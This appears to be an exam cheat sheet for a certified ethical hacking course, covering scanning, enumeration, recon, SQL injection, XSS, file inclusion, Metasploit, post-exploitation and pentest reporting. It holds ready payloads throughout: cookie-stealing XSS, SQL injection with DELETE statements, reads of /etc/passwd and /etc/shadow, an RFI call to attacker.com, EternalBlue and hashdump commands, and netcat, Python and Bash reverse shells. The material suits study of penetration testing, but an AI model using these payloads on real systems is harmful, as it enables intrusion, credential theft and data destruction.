⚑ Ethical Hacking: Exam Cheat Sheet ⚑
πŸ” NMAP Scan Types
nmap [options] <target>

SYN (Stealth): nmap -sS <target>
TCP Connect: nmap -sT <target>
UDP Scan: nmap -sU -p 53,161 <target>
FIN Scan: nmap -sF <target>
Ping Sweep: nmap -sn 192.168.1.0/24
OS Detection: nmap -O <target>
Version Detect: nmap -sV <target>
Default Scripts (not all scripts): nmap -sC <target>
Aggressive (-O, -sV, -sC, traceroute): nmap -A <target>
All Ports: nmap -p- <target>
Specific Ports: nmap -p 22,80,443 <target>

Timing (-T)

T0 Paranoid
T1 Sneaky
T2 Polite
T3 Normal
T4 Aggressive
T5 Insane

Port Response States

Open: SYN-ACK received
Closed: RST received
Filtered: no response / ICMP unreachable
📋 NMAP Enumeration Scripts (NSE)

SMB / Windows

nmap --script smb-enum-users.nse -p445 <host>
nmap --script smb-enum-groups.nse -p445 <host>
nmap --script smb-enum-shares.nse -p445 <host>
nmap --script smb-enum-processes.nse \
  --script-args smbusername=<u>,smbpassword=<p> -p445 <host>

Web

nmap -sV --script=http-enum <target>

SNMP

nmap -sU -p161 --script=snmp-info <target>
nmap -sU -p161 --script=snmp-brute <target>

SMTP Open Relay

nmap -p25 --script=smtp-open-relay <target>

Vuln Scan Combo

nmap -sV -sC -O -p- -T4 <target>

Other Enum Tools

enum4linux: enum4linux -a <target>
smbclient: smbclient -L //<target>
Nikto (web): nikto -h <target>
gobuster: gobuster dir -u <url> -w <wordlist>
ffuf: ffuf -u <url>/FUZZ -w <wordlist>
🌐 DNS & Passive Recon
nslookup: nslookup <domain>
dig any: dig <domain> any
dig MX: dig <domain> mx
dig reverse: dig -x <IP>
whois: whois <domain>
DNSrecon: dnsrecon -d <domain>
theHarvester: theHarvester -d <domain> -b all
h8mail: pip3 install h8mail, then h8mail -t <email>

Recon-ng Key Commands

recon-ng
marketplace search <keyword>
marketplace install <module>
modules load <module>
options set SOURCE <domain>
run

Google Dorks

filetype: filetype:xls "passwords"
inurl: inurl:admin login
intitle: intitle:"Index of /etc"
Sessions leak: intext:JSESSIONID inurl:access.log
Shodan: shodan search <query>
💉 SQL Injection

Basic Tests: put in any input field

'
"
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin'--
' OR 1=1--
1 OR 1=1
Smith' or '1'='1

UNION-Based

1 UNION SELECT null,null,null--
1 UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data--
omar' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

Blind / Boolean

1 AND 1=1 → true (data shown)
1 AND 1=2 → false (blank/error)
' AND SUBSTRING(username,1,1)='a'--

Time-Delay (Blind)

MySQL: ' AND SLEEP(5)--
MySQL: id=8 AND IF(version() like '8%',sleep(10),'false')--
MSSQL: '; WAITFOR DELAY '0:0:5'--
Postgres: '; SELECT pg_sleep(5)--

Stacked Queries

1; DELETE FROM customers
1; INSERT INTO users(username) VALUES ('omar')

URL Injection

?id=99 AND 1=2 (false)
?id=99 AND 1=1 (true)
?id=1234' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

DB Fingerprint (concat test)

MySQL: 'finger' 'printing' (adjacent literals concatenate)
MSSQL: 'finger' + 'printing'
Oracle/PG: 'finger'||'printing'

Categories

In-band, Blind/Inferential, Out-of-band, Boolean, Time-delay, Stacked, UNION, Error-based
SQLmap: sqlmap -u "<url>" --dbs
🔌 Key Ports
21: FTP
22: SSH
23: Telnet
25: SMTP
53: DNS
80: HTTP
110: POP3
135: MS-RPC
137-139: NetBIOS
143: IMAP
161/UDP: SNMP
443: HTTPS
445: SMB
465: SMTPS
587: SMTP submission (STARTTLS)
993: IMAPS
995: POP3S
3306: MySQL
3389: RDP
5355/UDP: LLMNR
⚑ XSS Payloads

Basic Test

<script>alert("XSS")</script>
javascript:alert(document.cookie)
<script>alert(document.cookie)</script>

Img Tag

<img src=javascript:alert('xss')>
<img src="x" onerror="alert('xss')">

Event Handlers

<a onmouseover="alert(document.cookie)">click</a>
<body onload=alert('xss')>

Types

Reflected (non-persistent), Stored (persistent), DOM-based
πŸ” Auth & Session Attacks

Session Fingerprint IDs

PHP: PHPSESSID
Java/J2EE: JSESSIONID
ASP.NET: ASP.NET_SessionId
ColdFusion: CFID / CFTOKEN

Pass-the-Hash

Password Tools

hashcat dict: hashcat -m 0 hash.txt wordlist
john dict: john --wordlist=rockyou.txt hash
john brute: john --incremental hash

CSRF Attack Pattern

http://target/csrf/?password_new=NEWPASS&password_conf=NEWPASS&Change=Change#
πŸ“ Path Traversal / File Inclusion

Directory Traversal

?page=../../../../../etc/passwd
?page=../../etc/shadow

URL Encoded Variants

../%2e%2e%2f
../%2e%2e/
../..%2f
..\%2e%2e%5c

LFI (Local File Inclusion)

?file=../etc/passwd
?lang=../../../../etc/passwd%00

RFI (Remote File Inclusion)

?page=http://attacker.com/malware.html
🎯 Metasploit Framework
msfconsole
search <term>
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST <target-ip>
set LHOST <your-ip>
exploit (or run)

EternalBlue (MS17-010)

use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target>
set LHOST <attacker>
exploit

Meterpreter Commands

List procs: ps
Dump hashes: hashdump
Shell: shell
Upload file: upload /path/file
Download file: download /path/file
Network info: ipconfig
Who am I: getuid
Clear logs: clearev
Migrate proc: migrate <PID>
Webcam snap: webcam_snap
Search files: search -f *.txt

Search Exploits CLI

searchsploit smb
searchsploit <CVE-XXXX-XXXX>
🐚 Netcat & Shells

Bind Shell (victim listens)

# On VICTIM: open listener + shell
nc -lvp 1234 -e /bin/bash
# On ATTACKER: connect to victim
nc -nv <victim-ip> 1234

Reverse Shell (attacker listens)

# On ATTACKER: open listener
nc -lvp 666
# On VICTIM: connect back to attacker
nc <attacker-ip> 666 -e /bin/bash

Other Netcat Uses

Port scan: nc -z <ip> 20-1000
Banner grab: nc -nv <ip> 80
Send file: nc -nv <ip> 1234 < file.txt
Recv file: nc -lvp 1234 > out.txt

Python Reverse Shell

python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER",666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'

Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKER/666 0>&1
🌩 Network Attacks

LLMNR/NBT-NS Poisoning

  • Tool: Responder
  • Spoof name resolution on LAN
  • Capture NTLMv2 hashes
  • Crack offline → plain passwords

ARP Poisoning / MITM

  • Tool: Ettercap, ARPspoof
  • Spoof MAC → intercept L2 traffic
  • ARP cache = IP→MAC table poisoned

DNS Cache Poisoning

  • Inject bad DNS records
  • Victim → attacker's IP instead of real

SMTP Commands (user enum)

telnet <mailserver> 25
HELO test
VRFY omar
EXPN admins

SNMP Attack

Walk: snmp-check <target>
Default creds: public / private
Brute NSE: --script snmp-brute

FTP Anonymous

ftp <target>
Username: anonymous
Password: (blank or email)

DoS Types

Direct, Reflected, Amplification, Botnet (DDoS)
🏴 Post-Exploitation & Persistence

Persistence Methods

  • Bind / Reverse shells
  • Scheduled tasks (Windows)
  • Custom daemons / services
  • Add new user accounts
  • Backdoors + rootkits
  • SSH tunnels / port forwarding

Lateral Movement

  • Network scanning post-exploit
  • SMB share enumeration
  • Pass-the-hash attacks
  • RDP / VNC access
  • Credential dumping → reuse

Cover Tracks

  • Delete created user accounts
  • Remove uploaded files & tools
  • Remove backdoors & daemons
  • Clear logs: clearev (meterpreter)
  • Restore modified configs

Steganography (steghide)

sudo apt install steghide
# Hide data in image (steghide supports JPEG/BMP/WAV/AU, not PNG;
# -cf = cover file, -ef = file to embed):
steghide embed -cf image.jpg -ef secret.txt
# Extract (-sf = stego file):
steghide extract -sf image.jpg

Priv Escalation Types

Vertical (low → admin), Horizontal (user → user)
🔟 OWASP Top 10 & Misc Web Attacks

OWASP 2025 Categories

Injection, Broken Auth, SSRF, Cryptographic Failures, Insecure Design, Security Misconfiguration, Vulnerable Components, Integrity Failures, Logging Failures, Broken Access Control

IDOR (Insecure Direct Object Ref)

?customerID=1188 → change to 1189
?user=omar → change to admin

HTTP Parameter Pollution

?search=cars&results=20&search=bikes (same parameter twice with different values)

HTTP Methods

GET, POST, PUT, DELETE, OPTIONS, TRACE

Command Injection

192.168.1.1; cat /etc/passwd
192.168.1.1 | whoami
192.168.1.1 && id

CSRF Attack URL

http://target/changepass?password_new=hack&password_conf=hack&Change=Change#

HTTP Status Ranges

1xx: Informational
2xx: Success
3xx: Redirect
4xx: Client Error
5xx: Server Error

Web Proxy Tools

Burp Suite, OWASP ZAP, Wireshark
πŸ“ Methodology & Pentest Phases

Pentest Phases (EC-Council)

  1. Reconnaissance (passive/active)
  2. Scanning & Enumeration
  3. Gaining Access (exploitation)
  4. Maintaining Access (persistence)
  5. Covering Tracks
  6. Reporting ← always!

Test Types

Black Box: no prior knowledge
White Box: full info (diagrams, creds)
Gray Box: limited info (some creds)
CTF: speed, get flags fast

Key Legal Documents

SOW (Statement of Work), NDA (Non-Disclosure Agreement), SLA (Service Level Agreement), Rules of Engagement, Scope Definition

Vulnerability Scan Types

Unauthenticated, Authenticated, Discovery, Full, Stealth, Compliance

Scoring Standards

CVE: CVE-YYYY-NNNN
CVSS: score 0–10 (base/temporal/environmental)
CWE: weakness taxonomy
Metasploit module exists: rate the finding HIGH severity (rule of thumb)
🎭 Social Engineering

Attack Types

Physical

Influence Methods

Authority, Fear, Urgency, Likeness, Scarcity, Social Proof

Tools

SET: setoolkit → clone sites
BeEF: XSS-based browser hook
⚑ Quick Reference

Kali One-liners

# Ping sweep
nmap -sn 192.168.1.0/24
# All ports, version, default scripts
nmap -sV -sC -p- <target>
# Aggressive
nmap -A -T4 <target>
# Vuln scripts
nmap --script vuln <target>
# FTP anon check
nmap --script ftp-anon <target>
# SMB vuln check (quoted so the shell does not expand the *)
nmap --script "smb-vuln*" <target>
# Nikto scan
nikto -h http://<target>
# Gobuster
gobuster dir -u http://<target> \
  -w /usr/share/wordlists/dirb/common.txt

SQLmap Quick

sqlmap -u "http://site.com/page?id=1" --dbs
sqlmap -u "url" -D <db> --tables
sqlmap -u "url" -D <db> -T <table> --dump
πŸ“ Pentest Report Structure

Required Sections

  • Executive Summary
  • Scope Details
  • Methodology used
  • Findings (with CVSS scores)
  • Remediation guidance
  • Conclusion & Summary
  • Appendix + Glossary

Remediation Controls

Technical (MFA, patching), Administrative (policies), Operational (training), Physical (CCTV, mantraps)

Post-Engagement

  • Remove all test artifacts
  • Restore original configs
  • Delete test credentials
  • Client sign-off / acceptance
  • Destroy client sensitive data
ETHICAL HACKING EXAM CHEAT SHEET: FOR AUTHORIZED TESTING ONLY